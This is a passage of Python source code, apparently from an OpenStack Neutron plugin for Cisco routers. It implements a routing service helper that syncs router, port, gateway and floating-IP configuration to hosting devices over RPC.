(reference) l3-agent implementation, for use with cisco config agent.
"""
def __init__(self, router_id, router):
self.router_id = router_id
self.ex_gw_port = None
self._snat_enabled = None
self._snat_action = None
self.internal_ports = []
self.floating_ips = []
self._router = None
self.router = router
self.routes = []
self.ha_info = router.get('ha_info')
@property
def router(self):
return self._router
@property
def id(self):
return self.router_id
@property
def snat_enabled(self):
return self._snat_enabled
@router.setter
def router(self, value):
self._router = value
if not self._router:
return
# enable_snat by default if it wasn't specified by plugin
self._snat_enabled = self._router.get('enable_snat', True)
def router_name(self):
return N_ROUTER_PREFIX + self.router_id
@property
def ha_enabled(self):
ha_enabled = self.router.get(ha.ENABLED, False)
return ha_enabled
class CiscoRoutingPluginApi(object):
"""RoutingServiceHelper(Agent) side of the routing RPC API."""
def __init__(self, topic, host):
self.host = host
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = n_rpc.get_client(target)
def get_routers(self, context, router_ids=None, hd_ids=None):
"""Make a remote process call to retrieve the sync data for routers.
:param context: session context
:param router_ids: list of routers to fetch
:param hd_ids : hosting device ids, only routers assigned to these
hosting devices will be returned.
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'cfg_sync_routers', host=self.host,
router_ids=router_ids, hosting_device_ids=hd_ids)
def get_router_ids(self, context, router_ids=None, hd_ids=None):
"""Make a remote process call to retrieve scheduled routers ids."""
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_cfg_router_ids', host=self.host,
router_ids=router_ids, hosting_device_ids=hd_ids)
def get_hardware_router_type_id(self, context):
"""Get the ID for the ASR1k hardware router type."""
cctxt = self.client.prepare()
return cctxt.call(context,
'get_hardware_router_type_id',
host=self.host)
def update_floatingip_statuses(self, context, router_id, fip_statuses):
"""Make a remote process call to update operational status for one or
several floating IPs.
@param context: contains user information
@param router_id: id of router associated with the floatingips
@param fip_statuses: dict with floatingip_id as key and status as value
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_floatingip_statuses_cfg',
router_id=router_id, fip_statuses=fip_statuses)
def send_update_port_statuses(self, context, port_ids, status):
"""Call the pluging to update the port status which updates the DB.
:param context: contains user information
:param port_ids: list of ids of the ports associated with the status
:param status: value of the status for the given port list (port_ids)
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_port_statuses_cfg',
port_ids=port_ids, status=status)
class RoutingServiceHelper(object):
target = oslo_messaging.Target(version='1.1')
def __init__(self, host, conf, cfg_agent):
self.conf = conf
self.cfg_agent = cfg_agent
self.context = bc.context.get_admin_context_without_session()
self.plugin_rpc = CiscoRoutingPluginApi(topics.L3PLUGIN, host)
self._dev_status = device_status.DeviceStatus()
self._dev_status.enable_heartbeat = (
self.conf.cfg_agent.enable_heartbeat)
self._drivermgr = driver_mgr.DeviceDriverManager()
self.router_info = {}
self.updated_routers = set()
self.removed_routers = set()
self.sync_devices = set()
self.sync_devices_attempts = 0
self.fullsync = True
self.sync_routers_chunk_size = SYNC_ROUTERS_MAX_CHUNK_SIZE
self.topic = '%s.%s' % (c_constants.CFG_AGENT_L3_ROUTING, host)
self.hardware_router_type = None
self.hardware_router_type_id = None
self._setup_rpc()
def _setup_rpc(self):
self.conn = n_rpc.create_connection()
self.endpoints = [self]
self.conn.create_consumer(self.topic, self.endpoints, fanout=False)
self.conn.consume_in_threads()
### Notifications from Plugin ####
def router_deleted(self, context, routers):
"""Deal with router deletion RPC message."""
LOG.debug('Got router deleted notification for %s', routers)
self.removed_routers.update(routers)
def routers_updated(self, context, routers):
"""Deal with routers modification and creation RPC message."""
LOG.debug('Got routers updated notification :%s', routers)
if routers:
# This is needed for backward compatibility
if isinstance(routers[0], dict):
routers = [router['id'] for router in routers]
self.updated_routers.update(routers)
def router_removed_from_hosting_device(self, context, routers):
LOG.debug('Got router removed from hosting device: %s', routers)
self.router_deleted(context, routers)
def router_added_to_hosting_device(self, context, routers):
LOG.debug('Got router added to hosting device :%s', routers)
self.routers_updated(context, routers)
# version 1.1
def routers_removed_from_hosting_device(self, context, router_ids):
LOG.debug('Got routers removed from hosting device: %s', router_ids)
self.router_deleted(context, router_ids)
# Routing service helper public methods
@property
def driver_manager(self):
return self._drivermgr
def process_service(self, device_ids=None, removed_devices_info=None):
try:
LOG.debug("Routing service processing started")
resources = {}
routers = []
removed_routers = []
all_routers_flag = False
if self.fullsync:
LOG.debug("FullSync flag is on. Starting fullsync")
# Setting all_routers_flag and clear the global full_sync flag
all_routers_flag = True
self.fullsync = False
self.router_info = {}
self.updated_routers.clear()
self.removed_routers.clear()
self.sync_devices.clear()
routers = self._fetch_router_info(all_routers=True)
LOG.debug("All routers: %s" % (pp.pformat(routers)))
if routers is not None:
self._cleanup_invalid_cfg(routers)
else:
if self.updated_routers:
router_ids = list(self.updated_routers)
LOG.debug("Updated routers:%s", router_ids)
self.updated_routers.clear()
routers = self._fetch_router_info(router_ids=router_ids)
LOG.debug("Updated routers:%s" % (pp.pformat(routers)))
if device_ids:
LOG.debug("Adding new devices:%s", device_ids)
self.sync_devices = set(device_ids) | self.sync_devices
if self.sync_devices:
self._handle_sync_devices(routers)
if removed_devices_info:
if removed_devices_info.get('deconfigure'):
ids = self._get_router_ids_from_removed_devices_info(
removed_devices_info)
self.removed_routers = self.removed_routers | set(ids)
if self.removed_routers:
removed_routers_ids = list(self.removed_routers)
LOG.debug("Removed routers:%s",
pp.pformat(removed_routers_ids))
for r in removed_routers_ids:
if r in self.router_info:
removed_routers.append(self.router_info[r].router)
# Sort on hosting device
if routers:
resources['routers'] = routers
if removed_routers:
resources['removed_routers'] = removed_routers
hosting_devices = self._sort_resources_per_hosting_device(
resources)
# Dispatch process_services() for each hosting device
pool = eventlet.GreenPool()
for device_id, resources in hosting_devices.items():
routers = resources.get('routers', [])
removed_routers = resources.get('removed_routers', [])
pool.spawn_n(self._process_routers, routers, removed_routers,
device_id, all_routers=all_routers_flag)
pool.waitall()
if removed_devices_info:
for hd_id in removed_devices_info['hosting_data']:
self.driver_manager.remove_driver_for_hosting_device(hd_id)
LOG.debug("Routing service processing successfully completed")
except Exception:
LOG.exception(_LE("Failed processing routers"))
self.fullsync = True
def collect_state(self, configurations):
"""Collect state from this helper.
A set of attributes which summarizes the state of the routers and
configurations managed by this config agent.
:param configurations: dict of configuration values
:return dict of updated configuration values
"""
num_ex_gw_ports = 0
num_interfaces = 0
num_floating_ips = 0
router_infos = self.router_info.values()
num_routers = len(router_infos)
num_hd_routers = collections.defaultdict(int)
for ri in router_infos:
ex_gw_port = ri.router.get('gw_port')
if ex_gw_port:
num_ex_gw_ports += 1
num_interfaces += len(ri.router.get(
bc.constants.INTERFACE_KEY, []))
num_floating_ips += len(ri.router.get(
bc.constants.FLOATINGIP_KEY, []))
hd = ri.router['hosting_device']
if hd:
num_hd_routers[hd['id']] += 1
routers_per_hd = dict((hd_id, {'routers': num})
for hd_id, num in num_hd_routers.items())
non_responding = self._dev_status.get_backlogged_hosting_devices()
configurations['total routers'] = num_routers
configurations['total ex_gw_ports'] = num_ex_gw_ports
configurations['total interfaces'] = num_interfaces
configurations['total floating_ips'] = num_floating_ips
configurations['hosting_devices'] = routers_per_hd
configurations['non_responding_hosting_devices'] = non_responding
return configurations
# Routing service helper internal methods
def _cleanup_invalid_cfg(self, routers):
# dict with hd id as key and associated routers list as val
hd_routermapping = collections.defaultdict(list)
for router in routers:
hd_routermapping[router['hosting_device']['id']].append(router)
# call cfg cleanup specific to device type from its driver
for hd_id, routers in six.iteritems(hd_routermapping):
temp_res = {"id": hd_id,
"hosting_device": routers[0]['hosting_device'],
"router_type": routers[0]['router_type']}
driver = self.driver_manager.set_driver(temp_res)
driver.cleanup_invalid_cfg(
routers[0]['hosting_device'], routers)
def _fetch_router_info(self, router_ids=None, device_ids=None,
all_routers=False):
"""Fetch router dict from the routing plugin.
:param router_ids: List of router_ids of routers to fetch
:param device_ids: List of device_ids whose routers to fetch
:param all_routers: If True fetch all the routers for this agent.
:return: List of router dicts of format:
[ {router_dict1}, {router_dict2},.....]
"""
try:
if all_routers:
router_ids = self.plugin_rpc.get_router_ids(self.context)
return self._fetch_router_chunk_data(router_ids)
if router_ids:
return self._fetch_router_chunk_data(router_ids)
if device_ids:
return self.plugin_rpc.get_routers(self.context,
hd_ids=device_ids)
except oslo_messaging.MessagingTimeout:
if self.sync_routers_chunk_size > SYNC_ROUTERS_MIN_CHUNK_SIZE:
self.sync_routers_chunk_size = max(
self.sync_routers_chunk_size / 2,
SYNC_ROUTERS_MIN_CHUNK_SIZE)
LOG.error(_LE('Server failed to return info for routers in '
'required time, decreasing chunk size to: %s'),
self.sync_routers_chunk_size)
else:
LOG.error(_LE('Server failed to return info for routers in '
'required time even with min chunk size: %s. '
'It might be under very high load or '
'just inoperable'),
self.sync_routers_chunk_size)
raise
except oslo_messaging.MessagingException:
LOG.exception(_LE("RPC Error in fetching routers from plugin"))
raise n_exc.AbortSyncRouters()
self.fullsync = True
LOG.debug("Periodic_sync_routers_task successfully completed")
# adjust chunk size after successful sync
if self.sync_routers_chunk_size < SYNC_ROUTERS_MAX_CHUNK_SIZE:
self.sync_routers_chunk_size = min(
self.sync_routers_chunk_size + SYNC_ROUTERS_MIN_CHUNK_SIZE,
SYNC_ROUTERS_MAX_CHUNK_SIZE)
def _fetch_router_chunk_data(self, router_ids=None):
"""Fetch router data from the routing plugin in chunks.
:param router_ids: List of router_ids of routers to fetch
:return: List of router dicts of format:
[ {router_dict1}, {router_dict2},.....]
"""
curr_router = []
if len(router_ids) > self.sync_routers_chunk_size:
# fetch routers by chunks to reduce the load on server and
# to start router processing earlier
for i in range(0, len(router_ids),
self.sync_routers_chunk_size):
routers = self.plugin_rpc.get_routers(
self.context, (router_ids[i:i +
self.sync_routers_chunk_size]))
LOG.debug('Processing :%r', routers)
for r in routers:
curr_router.append(r)
else:
curr_router = self.plugin_rpc.get_routers(
self.context, router_ids=router_ids)
return curr_router
def _handle_sync_devices(self, routers):
"""
Handles routers during a device_sync.
This method performs post-processing on routers fetched from the
routing plugin during a device sync. Routers are first fetched
from the plugin based on the list of device_ids. Since fetched
routers take precedence over pending work, matching router-ids
buffered in update_routers and removed_routers are discarded.
The existing router cache is also cleared in order to properly
trigger updates and deletes. Lastly, invalid configuration in
the underlying hosting-device is deleted via _cleanup_invalid_cfg.
Modifies updated_routers, removed_routers, and sync_devices
attributes
:param routers: working list of routers as populated in
process_services
"""
sync_devices_list = list(self.sync_devices)
LOG.debug("Fetching routers on:%s", sync_devices_list)
fetched_routers = self._fetch_router_info(device_ids=sync_devices_list)
if fetched_routers:
LOG.debug("[sync_devices] Fetched routers :%s",
pp.pformat(fetched_routers))
# clear router_config cache
for router_dict in fetched_routers:
self.updated_routers.discard(router_dict['id'])
self.removed_routers.discard(router_dict['id'])
LOG.debug("[sync_devices] invoking "
"_router_removed(%s)",
router_dict['id'])
self._router_removed(router_dict['id'],
deconfigure=False)
self._cleanup_invalid_cfg(fetched_routers)
routers.extend(fetched_routers)
self.sync_devices.clear()
LOG.debug("[sync_devices] %s finished",
sync_devices_list)
else:
# If the initial attempt to sync a device
# failed, retry again (by not clearing sync_devices)
# Normal updated_routers processing is still allowed
# to happen
self.sync_devices_attempts += 1
if (self.sync_devices_attempts >=
cfg.CONF.cfg_agent.max_device_sync_attempts):
LOG.debug("Max number [%d / %d ] of sync_devices "
"attempted. No further retries will "
"be attempted." %
(self.sync_devices_attempts,
cfg.CONF.cfg_agent.max_device_sync_attempts))
self.sync_devices.clear()
self.sync_devices_attempts = 0
else:
LOG.debug("Fetched routers was blank for sync attempt "
"[%d / %d], will attempt resync of %s devices "
"again in the next iteration" %
(self.sync_devices_attempts,
cfg.CONF.cfg_agent.max_device_sync_attempts,
pp.pformat(self.sync_devices)))
@staticmethod
def _get_router_ids_from_removed_devices_info(removed_devices_info):
"""Extract router_ids from the removed devices info dict.
:param removed_devices_info: Dict of removed devices and their
associated resources.
Format:
{
'hosting_data': {'hd_id1': {'routers': [id1, id2, ...]},
'hd_id2': {'routers': [id3, id4, ...]},
...
},
'deconfigure': True/False
}
:return removed_router_ids: List of removed router ids
"""
removed_router_ids = []
for hd_id, resources in removed_devices_info['hosting_data'].items():
removed_router_ids += resources.get('routers', [])
return removed_router_ids
@staticmethod
def _sort_resources_per_hosting_device(resources):
"""This function will sort the resources on hosting device.
The sorting on hosting device is done by looking up the
`hosting_device` attribute of the resource, and its `id`.
:param resources: a dict with key of resource name
:return dict sorted on the hosting device of input resource. Format:
hosting_devices = {
'hd_id1' : {'routers':[routers],
'removed_routers':[routers], .... }
'hd_id2' : {'routers':[routers], .. }
.......
}
"""
hosting_devices = {}
for key in resources.keys():
for r in resources.get(key) or []:
if r.get('hosting_device') is None:
continue
hd_id = r['hosting_device']['id']
hosting_devices.setdefault(hd_id, {})
hosting_devices[hd_id].setdefault(key, []).append(r)
return hosting_devices
def _adjust_router_list_for_global_router(self, routers):
"""
Pushes 'Global' routers to the end of the router list, so that
deleting default route occurs before deletion of external nw subintf
"""
#ToDo(Hareesh): Simplify if possible
for r in routers:
if r[ROUTER_ROLE_ATTR] == c_constants.ROUTER_ROLE_GLOBAL:
LOG.debug("Global router:%s found. Moved to the end of list "
"for processing", r['id'])
routers.remove(r)
routers.append(r)
def _process_routers(self, routers, removed_routers,
device_id=None, all_routers=False):
"""Process the set of routers.
Iterating on the set of routers received and comparing it with the
set of routers already in the routing service helper, new routers
which are added are identified. Before processing check the
reachability (via ping) of hosting device where the router is hosted.
If device is not reachable it is backlogged.
For routers which are only updated, call `_process_router()` on them.
When all_routers is set to True (because of a full sync),
this will result in the detection and deletion of routers which
have been removed.
Whether the router can only be assigned to a particular hosting device
is decided and enforced by the plugin. No checks are done here.
:param routers: The set of routers to be processed
:param removed_routers: the set of routers which where removed
:param device_id: Id of the hosting device
:param all_routers: Flag for specifying a partial list of routers
:return: None
"""
try:
if all_routers:
prev_router_ids = set(self.router_info)
else:
prev_router_ids = set(self.router_info) & set(
[router['id'] for router in routers])
cur_router_ids = set()
deleted_routerids_list = []
for r in routers:
if not r['admin_state_up']:
continue
cur_router_ids.add(r['id'])
# identify list of routers(ids) that no longer exist
for router_id in prev_router_ids - cur_router_ids:
deleted_routerids_list.append(router_id)
if removed_routers:
self._adjust_router_list_for_global_router(removed_routers)
for router in removed_routers:
deleted_routerids_list.append(router['id'])
self._adjust_router_list_for_global_router(routers)
# First process create/updated routers
for r in routers:
LOG.debug("Processing router[id:%(id)s, role:%(role)s]",
{'id': r['id'], 'role': r[ROUTER_ROLE_ATTR]})
if r['id'] in deleted_routerids_list:
continue
if r['status'] == c_constants.ROUTER_INFO_INCOMPLETE:
# The plugin could not fill in all the info due to
# timing and db settling down. So put this router
# back in updated_routers, we will pull again on the
# sync time.
LOG.debug("Router: %(id)s INFO_INCOMPLETE",
{'id': r['id']})
self.updated_routers.add(r['id'])
continue
try:
if not r['admin_state_up']:
continue
cur_router_ids.add(r['id'])
hd = r['hosting_device']
if not self._dev_status.is_hosting_device_reachable(hd):
LOG.info(_LI("Router: %(id)s is on an unreachable "
"hosting device. "), {'id': r['id']})
continue
if r['id'] not in self.router_info:
self._router_added(r['id'], r)
ri = self.router_info[r['id']]
ri.router = r
self._process_router(ri)
except ncc_errors.SessionCloseError as e:
LOG.exception(
_LE("ncclient Unexpected session close %s"), e)
if not self._dev_status.is_hosting_device_reachable(
r['hosting_device']):
LOG.debug("Lost connectivity to Hosting Device %s" %
r['hosting_device']['id'])
# Will rely on heartbeat to detect hd state
# and schedule resync when hd comes back
else:
# retry the router update on the next pass
self.updated_routers.add(r['id'])
LOG.debug("RETRY_RTR_UPDATE %s" % (r['id']))
continue
except KeyError as e:
LOG.exception(_LE("Key Error, missing key: %s"), e)
self.updated_routers.add(r['id'])
continue
except cfg_exceptions.DriverException as e:
LOG.exception(_LE("Driver Exception on router:%(id)s. "
"Error is %(e)s"), {'id': r['id'],
'e': e})
self.updated_routers.update([r['id']])
continue
LOG.debug("Done processing router[id:%(id)s, role:%(role)s]",
{'id': r['id'], 'role': r[ROUTER_ROLE_ATTR]})
# Finally process removed routers
for router_id in deleted_routerids_list:
LOG.debug("Processing deleted router:%s", router_id)
self._router_removed(router_id)
except Exception:
LOG.exception(_LE("Exception in processing routers on device:%s"),
device_id)
self.sync_devices.add(device_id)
def _send_update_port_statuses(self, port_ids, status):
"""Sends update notifications to set the operational status of the
list of router ports provided. To make each notification doesn't exceed
the RPC length, each message contains a maximum of MAX_PORTS_IN_BATCH
port ids.
:param port_ids: List of ports to update the status
:param status: operational status to update
(ex: bc.constants.PORT_STATUS_ACTIVE)
"""
if not port_ids:
return
MAX_PORTS_IN_BATCH = 50
list_chunks_ports = [port_ids[i:i + MAX_PORTS_IN_BATCH]
for i in six.moves.range(0, len(port_ids), MAX_PORTS_IN_BATCH)]
for chunk_ports in list_chunks_ports:
self.plugin_rpc.send_update_port_statuses(self.context,
chunk_ports, status)
def _get_internal_port_changes(self, ri, internal_ports):
existing_port_ids = set([p['id'] for p in ri.internal_ports])
current_port_ids = set([p['id'] for p in internal_ports
if p['admin_state_up']])
new_ports = [p for p in internal_ports
if
p['id'] in (current_port_ids - existing_port_ids)]
old_ports = [p for p in ri.internal_ports
if p['id'] not in current_port_ids]
new_port_ids = [p['id'] for p in new_ports]
old_port_ids = [p['id'] for p in old_ports]
LOG.debug("++ new_port_ids = %s" % (pp.pformat(new_port_ids)))
LOG.debug("++ old_port_ids = %s" % (pp.pformat(old_port_ids)))
return new_ports, old_ports
def _enable_disable_ports(self, ri, ex_gw_port, internal_ports):
if not ri.router['admin_state_up']:
self._disable_router_interface(ri)
else:
if ex_gw_port:
if not ex_gw_port['admin_state_up']:
self._disable_router_interface(ri, ex_gw_port)
else:
self._enable_router_interface(ri, ex_gw_port)
for port in internal_ports:
if not port['admin_state_up']:
self._disable_router_interface(ri, port)
else:
self._enable_router_interface(ri, port)
def _process_new_ports(self, ri, new_ports, ex_gw_port, list_port_ids_up):
#TODO(bmelande): 1. We need to handle the case where an external
# network, to which a global router is connected,
# is given another subnet. The global router must
# then attached to that subnet. That attachment
# does NOT result in a new router port. Instead, it
# is done as an update to an EXISTING router port
# which gets another ip address (from the newly
# added subnet.
for p in new_ports:
# We sort the port's subnets on subnet_id so we can be sure that
# the same ip address is used as primary on the HA master router
# as well as on all HA backup routers.
port_subnets = sorted(p['subnets'], key=itemgetter('id'))
num_subnets_on_port = len(port_subnets)
LOG.debug("Number of subnets associated with router port = %d" %
num_subnets_on_port)
if (ri.router[ROUTER_ROLE_ATTR] is None and
num_subnets_on_port > 1):
LOG.error(_LE("Ignoring router port with multiple IPv4 "
"subnets associated"))
raise MultipleIPv4SubnetsException(
port_id=p['id'], subnets=pp.pformat(port_subnets))
# Configure the primary IP address
self._set_subnet_info(p, port_subnets[0]['id'])
self._internal_network_added(ri, p, ex_gw_port)
# Process the secondary subnets. Only router ports of global
# routers can have multiple ipv4 subnets since we connect such
# routers to external networks using regular router ports.
for p_sn in port_subnets[1:]:
self._set_subnet_info(p, p_sn['id'], is_primary=False)
self._internal_network_added(ri, p, ex_gw_port)
ri.internal_ports.append(p)
list_port_ids_up.append(p['id'])
def _process_old_ports(self, ri, old_ports, ex_gw_port):
for p in old_ports:
self._internal_network_removed(ri, p, ri.ex_gw_port)
ri.internal_ports.remove(p)
def _process_gateway_set(self, ri, ex_gw_port, list_port_ids_up):
# We sort the port's subnets on subnet_id so we can be sure that
# the same ip address is used as primary on the HA master router
# as well as on all HA backup routers.
gw_port_subnets = sorted(ex_gw_port['subnets'], key=itemgetter('id'))
# Configure the primary IP address
self._set_subnet_info(ex_gw_port, gw_port_subnets[0]['id'])
self._external_gateway_added(ri, ex_gw_port)
# Process the secondary subnets
for gw_p_sn in gw_port_subnets[1:]:
self._set_subnet_info(ex_gw_port, gw_p_sn['id'], is_primary=False)
self._external_gateway_added(ri, ex_gw_port)
list_port_ids_up.append(ex_gw_port['id'])
def _process_gateway_cleared(self, ri, ex_gw_port):
# We sort the port's subnets on subnet_id so we can be sure that
# the same ip address is used as primary on the HA master router
# as well as on all HA backup routers.
gw_port_subnets = sorted(ex_gw_port['subnets'], key=itemgetter('id'))
# Deconfigure the primary IP address
self._set_subnet_info(ex_gw_port, gw_port_subnets[0]['id'])
self._external_gateway_removed(ri, ex_gw_port)
# Process the secondary subnets
for gw_p_sn in gw_port_subnets[1:]:
self._set_subnet_info(ex_gw_port, gw_p_sn['id'], is_primary=False)
self._external_gateway_removed(ri, ex_gw_port)
def _add_rid_to_vrf_list(self, ri):
# not needed in base service helper
pass
def _remove_rid_from_vrf_list(self, ri):
# not needed in base service helper
pass
def _process_router(self, ri):
"""Process a router, apply latest configuration and update router_info.
Get the router dict from RouterInfo and proceed to detect changes
from the last known state. When new ports or deleted ports are
detected, `internal_network_added()` or `internal_networks_removed()`
are called accordingly. Similarly changes in ex_gw_port causes
`external_gateway_added()` or `external_gateway_removed()` calls.
Next, floating_ips and routes are processed. Also, latest state is
stored in ri.internal_ports and ri.ex_gw_port for future comparisons.
:param ri : RouterInfo object of the router being processed.
:return:None
:raises: networking_cisco.plugins.cisco.cfg_agent.cfg_exceptions.
DriverException if the configuration operation fails.
"""
try:
ex_gw_port = ri.router.get('gw_port')
ri.ha_info = ri.router.get('ha_info', None)
gateway_set = ex_gw_port and not ri.ex_gw_port
gateway_cleared = not ex_gw_port and ri.ex_gw_port
internal_ports = ri.router.get(bc.constants.INTERFACE_KEY, [])
# Once the gateway is set, then we know which VRF
# this router belongs to. Keep track of it in our
# lists of routers, organized as a dictionary by
# VRF name
if gateway_set:
self._add_rid_to_vrf_list(ri)
new_ports, old_ports = self._get_internal_port_changes(
ri, internal_ports)
list_port_ids_up = []
self._process_new_ports(ri, new_ports,
ex_gw_port, list_port_ids_up)
self._process_old_ports(ri, old_ports, ex_gw_port)
if gateway_set:
self._process_gateway_set(ri, ex_gw_port,
list_port_ids_up)
elif gateway_cleared:
self._process_gateway_cleared(ri, ri.ex_gw_port)
self._send_update_port_statuses(list_port_ids_up,
bc.constants.PORT_STATUS_ACTIVE)
if ex_gw_port:
self._process_router_floating_ips(ri, ex_gw_port)
if ri.router[ROUTER_ROLE_ATTR] not in \
[c_constants.ROUTER_ROLE_GLOBAL,
c_constants.ROUTER_ROLE_LOGICAL_GLOBAL]:
self._enable_disable_ports(ri, ex_gw_port, internal_ports)
if gateway_cleared:
# Remove this router from the list of routers by VRF
self._remove_rid_from_vrf_list(ri)
ri.ex_gw_port = ex_gw_port
self._routes_updated(ri)
except cfg_exceptions.HAParamsMissingException as e:
self.updated_routers.update([ri.router_id])
LOG.warning(e)
except cfg_exceptions.DriverException as e:
with excutils.save_and_reraise_exception():
self.updated_routers.update([ri.router_id])
LOG.error(e)
def _process_router_floating_ips(self, ri, ex_gw_port):
"""Process a router's floating ips.
Compare floatingips configured in device (i.e., those fips in
the ri.floating_ips "cache") with the router's updated floating ips
(in ri.router.floating_ips) and determine floating_ips which were
added or removed. Notify driver of the change via
`floating_ip_added()` or `floating_ip_removed()`. Also update plugin
with status of fips.
:param ri: RouterInfo object of the router being processed.
:param ex_gw_port: Port dict of the external gateway port.
:return: None
:raises: networking_cisco.plugins.cisco.cfg_agent.cfg_exceptions.
DriverException if the configuration operation fails.
"""
# fips that exist in neutron db (i.e., the desired "truth")
current_fips = ri.router.get(bc.constants.FLOATINGIP_KEY, [])
# ids of fips that exist in neutron db
current_fip_ids = {fip['id'] for fip in current_fips}
# ids of fips that are configured in device
configured_fip_ids = {fip['id'] for fip in ri.floating_ips}
id_to_current_fip_map = {}
fips_to_add = []
# iterate of fips that exist in neutron db
for configured_fip in current_fips:
if configured_fip['port_id']:
# store to later check if this fip has been remapped
id_to_current_fip_map[configured_fip['id']] = configured_fip
if configured_fip['id'] not in configured_fip_ids:
# Ensure that we add only after remove, in case same
# fixed_ip is mapped to different floating_ip within
# the same loop cycle. If add occurs before first,
# cfg will fail because of existing entry with
# identical fixed_ip
fips_to_add.append(configured_fip)
fip_ids_to_remove = configured_fip_ids - current_fip_ids
LOG.debug("fip_ids_to_add: %s" % fips_to_add)
LOG.debug("fip_ids_to_remove: %s" % fip_ids_to_remove)
fips_to_remove = []
fip_statuses = {}
# iterate over fips that are configured in device
for configured_fip in ri.floating_ips:
if configured_fip['id'] in fip_ids_to_remove:
fips_to_remove.append(configured_fip)
self._floating_ip_removed(
ri, ri.ex_gw_port, configured_fip['floating_ip_address'],
configured_fip['fixed_ip_address'])
fip_statuses[configured_fip['id']] = (
bc.constants.FLOATINGIP_STATUS_DOWN)
LOG.debug("Add to fip_statuses DOWN id:%s fl_ip:%s fx_ip:%s",
configured_fip['id'],
configured_fip['floating_ip_address'],
configured_fip['fixed_ip_address'])
else:
# handle possibly required remapping of a fip
# ip address that fip currently is configured for
configured_fixed_ip = configured_fip['fixed_ip_address']
new_fip = id_to_current_fip_map[configured_fip['id']]
# ip address that fip should be configured for
current_fixed_ip = new_fip['fixed_ip_address']
if (current_fixed_ip and configured_fixed_ip and
current_fixed_ip != configured_fixed_ip):
floating_ip = configured_fip['floating_ip_address']
self._floating_ip_removed(ri, ri.ex_gw_port,
floating_ip, configured_fixed_ip)
fip_statuses[configured_fip['id']] = (
bc.constants.FLOATINGIP_STATUS_DOWN)
fips_to_remove.append(configured_fip)
fips_to_add.append(new_fip)
for configured_fip in fips_to_remove:
# remove fip from "cache" of fips configured in device
ri.floating_ips.remove(configured_fip)
for configured_fip in fips_to_add:
self._floating_ip_added(ri, ex_gw_port,
configured_fip['floating_ip_address'],
configured_fip['fixed_ip_address'])
# add fip to "cache" of fips configured in device
ri.floating_ips.append(configured_fip)
fip_statuses[configured_fip['id']] = (
bc.constants.FLOATINGIP_STATUS_ACTIVE)
LOG.debug("Add to fip_statuses ACTIVE id:%s fl_ip:%s fx_ip:%s",
configured_fip['id'],
configured_fip['floating_ip_address'],
configured_fip['fixed_ip_address'])
if fip_statuses:
LOG.debug("Sending floatingip_statuses_update: %s", fip_statuses)
self.plugin_rpc.update_floatingip_statuses(
self.context, ri.router_id, fip_statuses)
def _router_added(self, router_id, router):
"""Operations when a router is added.
Create a new RouterInfo object for this router and add it to the
service helpers router_info dictionary. Then `router_added()` is
called on the device driver.
:param router_id: id of the router
:param router: router dict
:return: None
"""
ri = RouterInfo(router_id, router)
driver = self.driver_manager.set_driver(router)
if router[ROUTER_ROLE_ATTR] in [
c_constants.ROUTER_ROLE_GLOBAL,
c_constants.ROUTER_ROLE_LOGICAL_GLOBAL]:
# No need to create a vrf for Global or logical global routers
LOG.debug("Skipping router_added device processing for %(id)s as "
"its role is %(role)s",
{'id': router_id, 'role': router[ROUTER_ROLE_ATTR]})
else:
driver.router_added(ri)
self.router_info[router_id] = ri
def _router_removed(self, router_id, deconfigure=True):
"""Operations when a router is removed.
Get the RouterInfo object corresponding to the router in the service
helpers's router_info dict. If deconfigure is set to True,
remove this router's configuration from the hosting device.
:param router_id: id of the router
:param deconfigure: if True, the router's configuration is deleted from
the hosting device.
:return: None
"""
ri = self.router_info.get(router_id)
if ri is None:
LOG.warning(_LW("Info for router %s was not found. "
"Skipping router removal"), router_id)
return
ri.router['gw_port'] = None
ri.router[bc.constants.INTERFACE_KEY] = []
ri.router[bc.constants.FLOATINGIP_KEY] = []
try:
hd = ri.router['hosting_device']
# We proceed to removing the configuration from the device
# only if (a) deconfigure is set to True (default)
# (b) the router's hosting device is reachable.
if (deconfigure and
self._dev_status.is_hosting_device_reachable(hd)):
self._process_router(ri)
driver = self.driver_manager.get_driver(router_id)
driver.router_removed(ri)
self.driver_manager.remove_driver(router_id)
del self.router_info[router_id]
self.removed_routers.discard(router_id)
except cfg_exceptions.DriverException:
LOG.warning(_LW("Router remove for router_id: %s was incomplete. "
"Adding the router to removed_routers list"),
router_id)
self.removed_routers.add(router_id)
# remove this router from updated_routers if it is there. It might
# end up there too if exception was thrown earlier inside
# `_process_router()`
self.updated_routers.discard(router_id)
except ncc_errors.SessionCloseError as e:
LOG.exception(_LE("ncclient Unexpected session close %s"
" while attempting to remove router"), e)
if not self._dev_status.is_hosting_device_reachable(hd):
LOG.debug("Lost connectivity to Hosting Device %s" % hd['id'])
# rely on heartbeat to detect HD state
# and schedule resync when the device comes back
else:
# retry the router removal on the next pass
self.removed_routers.add(router_id)
LOG.debug("Interim connectivity lost to hosting device %s, "
"enqueuing router %s in removed_routers set" %
pp.pformat(hd), router_id)
def _internal_network_added(self, ri, port, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
driver.internal_network_added(ri, port)
if ri.snat_enabled and ex_gw_port:
driver.enable_internal_network_NAT(ri, port, ex_gw_port)
def _internal_network_removed(self, ri, port, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
driver.internal_network_removed(ri, port)
if ri.snat_enabled and ex_gw_port:
#ToDo(Hareesh): Check if the intfc_deleted attribute is needed
driver.disable_internal_network_NAT(ri, port, ex_gw_port,
itfc_deleted=True)
def _external_gateway_added(self, ri, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
driver.external_gateway_added(ri, ex_gw_port)
if ri.snat_enabled and ri.internal_ports:
for port in ri.internal_ports:
driver.enable_internal_network_NAT(ri, port, ex_gw_port)
def _external_gateway_removed(self, ri, ex_gw_port):
driver = self.driver_manager.get_driver(ri.id)
if ri.snat_enabled and ri.internal_ports:
for port in ri.internal_ports:
driver.disable_internal_network_NAT(ri, port, ex_gw_port)
driver.external_gateway_removed(ri, ex_gw_port)
def _floating_ip_added(self, ri, ex_gw_port, floating_ip, fixed_ip):
driver = self.driver_manager.get_driver(ri.id)
driver.floating_ip_added(ri, ex_gw_port, floating_ip, fixed_ip)
